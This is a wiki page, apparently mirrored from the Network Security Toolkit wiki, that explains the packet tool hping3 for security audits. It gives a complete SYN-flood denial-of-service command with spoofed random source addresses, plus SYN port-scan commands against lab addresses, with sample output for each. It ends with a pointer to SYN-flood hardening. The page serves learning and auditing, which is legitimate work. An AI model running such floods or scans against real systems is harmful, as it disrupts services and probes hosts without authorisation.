Onnowpurbo: Created page with "Sumber: http://wiki.networksecuritytoolkit.org/index.php/HowTo_Perform_A_Security_Audit_With_hping3_(DoS) TOC = Overview = This page discusses the use of '''[http://www..."

2018-05-29T03:51:53Z

Created page with "Sumber: http://wiki.networksecuritytoolkit.org/index.php/HowTo_Perform_A_Security_Audit_With_hping3_(DoS) __TOC__ = Overview = This page discusses the use of '''[http://www..."

New page

Sumber: http://wiki.networksecuritytoolkit.org/index.php/HowTo_Perform_A_Security_Audit_With_hping3_(DoS)

__TOC__
= Overview =
This page discusses the use of '''[http://www.hping.org/ hping3]''' to perform a '''[https://en.wikipedia.org/wiki/Denial-of-service_attack Denial-of-Service (DoS)]''' attack as part of a security audit. Information on this page was derived from the '''[https://www.blackmoreops.com/ blackMORE Ops]''' article: "'''[https://www.blackmoreops.com/2015/04/21/denial-of-service-attack-dos-using-hping3-with-spoofed-ip-in-kali-linux/ Denial-of-service Attack – DoS using hping3 with spoofed IP in Kali Linux]'''". hping3 is install on '''[http://www.networksecuritytoolkit.org Network Security Toolkit (NST)]''' like many other security auditing and penetration tools.

= hping3 Explained =
'''hping3''' is a free packet generator and analyzer for the '''[https://en.wikipedia.org/wiki/Internet_protocol_suite TCP/IP]''' protocol. Hping is one of the de-facto tools for security auditing and testing of firewalls and networks, and was used to exploit the '''[https://en.wikipedia.org/wiki/Idle_scan Idle Scan]''' scanning technique now implemented in the '''[https://nmap.org/ Nmap]''' port scanner. hping3, is scriptable using the '''[https://en.wikipedia.org/wiki/Tcl Tcl]''' language and implements an engine for string based, human readable description of TCP/IP packets, so that the programmer can write scripts related to low level TCP/IP packet manipulation and analysis in a very short time.

Like most tools used in computer security, hping3 is useful to professional security experts, but there are a lot of applications related to network testing and system administration.

== hping3 Intended Use Cases ==
* '''[https://en.wikipedia.org/wiki/Traceroute Traceroute]''' / '''[https://en.wikipedia.org/wiki/Ping_(networking_utility) ping]''' / probe hosts behind a '''[https://en.wikipedia.org/wiki/Firewall_(computing) firewall]''' that blocks attempts using the standard utilities.
* Advanced port scanning.
* Perform the idle scan (now implemented in nmap with an easy user interface).
* Test firewall rule sets.
* Test '''[https://en.wikipedia.org/wiki/Intrusion_detection_system IDS]''' systems.
* Exploit known vulnerabilities of TCP/IP stacks.
* Networking research.
* Learn and explore TCP/IP.
* Write real applications related to TCP/IP testing and security.
* Automated firewall tests.
* Proof of concept exploits.
* Networking and security research when there is the need to emulate complex TCP/IP behavior.
* Prototype IDS systems.
* Simple to use networking utilities with '''[https://en.wikipedia.org/wiki/Tk_(software) Tk]''' interface.
* Remote OS fingerprinting.

= DoS Using hping3 =
This use case will demonstrate a DoS TCP/IP SYN (Sync) attack using hping3. The intended target: IPv4 Address: '''10.222.222.15''' will be flooded with TCP/IP SYN packets. One can the observed the behavior of the target system during the DoS attack for stability, responsiveness and performance. The following parameters are explained for this use case:
{|
| -I lan0
|Force packets to use this network interface device: "'''lan0'''" only.
|-
| -c 1000000
|Stop after sending (and receiving) count number of response packets: "'''1000000'''".
|-
| -d 120
|Set the packet body size: "'''120 octets'''".
|-
| -S
|Set the TCP/IP SYN flag thus sending out '''SYN''' packets.
|-
| -w 64
|Set the TCP/IP window size: "'''64 octets'''".
|-
| -p 80
|Set the TCP/IP destination port: "'''80'''".
|-
| --flood
|Send out packets as fast as possible.
|-
| --rand-source
|Send out random source IPv4 Addresses.
|-
|10.222.222.15
|Target host system.
|}

<div class="screen">
<div class="userInput"><span class="prompt">[root@probe ~]# </span>/usr/sbin/hping3 -I lan0 -c 1000000 -d 120 -S -w 64 -p 80 --flood --rand-source 10.222.222.15;</div>
<pre class="computerOutput">

HPING 10.222.222.15 (lan0 10.222.222.15): S set, 40 headers + 120 data bytes
hping in flood mode, no replies will be shown
^C
--- 10.222.222.15 hping statistic ---
2031701 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

</pre>
<div class="userInput"><span class="prompt">[root@probe ~]# </span></div>
</div>
 

= Host SYN Scan Using Using A Single Port =
This use case will demonstrate a TCP/IP SYN scan using hping3. The intended target: IPv4 Address: '''10.222.222.15''' will be scanned using "'''10'''" sequential SYN packets:
<div class="screen">
<div class="userInput"><span class="prompt">[root@probe ~]# </span>/usr/sbin/hping3 -I lan0 -c 10 -d 120 -S -w 64 -p 80 10.222.222.15;</div>
<pre class="computerOutput">

HPING 10.222.222.15 (lan0 10.222.222.15): S set, 40 headers + 120 data bytes
len=46 ip=10.222.222.15 ttl=64 DF id=0 sport=80 flags=SA seq=0 win=29200 rtt=0.3 ms
len=46 ip=10.222.222.15 ttl=64 DF id=0 sport=80 flags=SA seq=1 win=29200 rtt=0.2 ms
len=46 ip=10.222.222.15 ttl=64 DF id=0 sport=80 flags=SA seq=2 win=29200 rtt=0.3 ms
len=46 ip=10.222.222.15 ttl=64 DF id=0 sport=80 flags=SA seq=3 win=29200 rtt=0.2 ms
len=46 ip=10.222.222.15 ttl=64 DF id=0 sport=80 flags=SA seq=4 win=29200 rtt=0.2 ms
len=46 ip=10.222.222.15 ttl=64 DF id=0 sport=80 flags=SA seq=5 win=29200 rtt=0.2 ms
len=46 ip=10.222.222.15 ttl=64 DF id=0 sport=80 flags=SA seq=6 win=29200 rtt=0.2 ms
len=46 ip=10.222.222.15 ttl=64 DF id=0 sport=80 flags=SA seq=7 win=29200 rtt=0.2 ms
len=46 ip=10.222.222.15 ttl=64 DF id=0 sport=80 flags=SA seq=8 win=29200 rtt=0.2 ms
len=46 ip=10.222.222.15 ttl=64 DF id=0 sport=80 flags=SA seq=9 win=29200 rtt=0.3 ms

--- 10.222.222.15 hping statistic ---
10 packets transmitted, 10 packets received, 0% packet loss
round-trip min/avg/max = 0.2/0.2/0.3 ms

</pre>
<div class="userInput"><span class="prompt">[root@probe ~]# </span></div>
</div>
 

= Host SYN Scan Using Using A Port Range=
This use case will demonstrate a TCP/IP SYN scan using hping3 with a port range. The intended target: IPv4 Address: '''10.222.222.107''' will be scanned sending out sequential SYN packets using ports 9940 through 9950. This target system is an NST host. One can see that the NST WUI service responding on port: "'''9943'''" with TCP/IP flags '''SYN''' and '''ACK (Acknowledgment)''' set. The other received packets responded with the TCP/IP flags '''RST (Reset the Connection)''' and '''ACK''' since no service is listening on these ports.
<div class="screen">
<div class="userInput"><span class="prompt">[root@probe ~]# </span>/usr/sbin/hping3 -I lan0 -f -V --scan 9940-9950 -S 10.222.222.107;</div>
<pre class="computerOutput">

using lan0, addr: 10.222.222.10, MTU: 1500
Scanning 10.222.222.107 (10.222.222.107), port 9940-9950
11 ports to scan, use -V to see all the replies
+----+-----------+---------+---+-----+-----+-----+
|port| serv name | flags |ttl| id | win | len |
+----+-----------+---------+---+-----+-----+-----+
9940 : ..R.A... 64 61660 0 46
9941 : ..R.A... 64 61916 0 46
9942 : ..R.A... 64 62172 0 46
9943 : .S..A... 64 0 29200 46
9944 : ..R.A... 64 62428 0 46
9945 : ..R.A... 64 62684 0 46
9946 : ..R.A... 64 62940 0 46
9947 : ..R.A... 64 63196 0 46
9948 : ..R.A... 64 63452 0 46
9949 : ..R.A... 64 63708 0 46
9950 apc-9950 : ..R.A... 64 63964 0 46
All replies received. Done.
Not responding ports:

</pre>
<div class="userInput"><span class="prompt">[root@probe ~]# </span></div>
</div>
 

= DoS SYN Flood Protection =
Today's firewalls and most Linux kernels have built-in SYN attack flood protection. This HowTo was meant for research and learning purpose. The following is an article on '''[https://www.ndchost.com/wiki/server-administration/hardening-tcpip-syn-flood Hardening your TCP/IP Stack Against SYN Floods]'''.

==Referensi==

* http://wiki.networksecuritytoolkit.org/index.php/HowTo_Perform_A_Security_Audit_With_hping3_(DoS)

Hping3: security audit firewall - Revision history

Onnowpurbo: Created page with "Sumber: http://wiki.networksecuritytoolkit.org/index.php/HowTo_Perform_A_Security_Audit_With_hping3_(DoS) __TOC__ = Overview = This page discusses the use of '''[http://www..."

Onnowpurbo: Created page with "Sumber: http://wiki.networksecuritytoolkit.org/index.php/HowTo_Perform_A_Security_Audit_With_hping3_(DoS) TOC = Overview = This page discusses the use of '''[http://www..."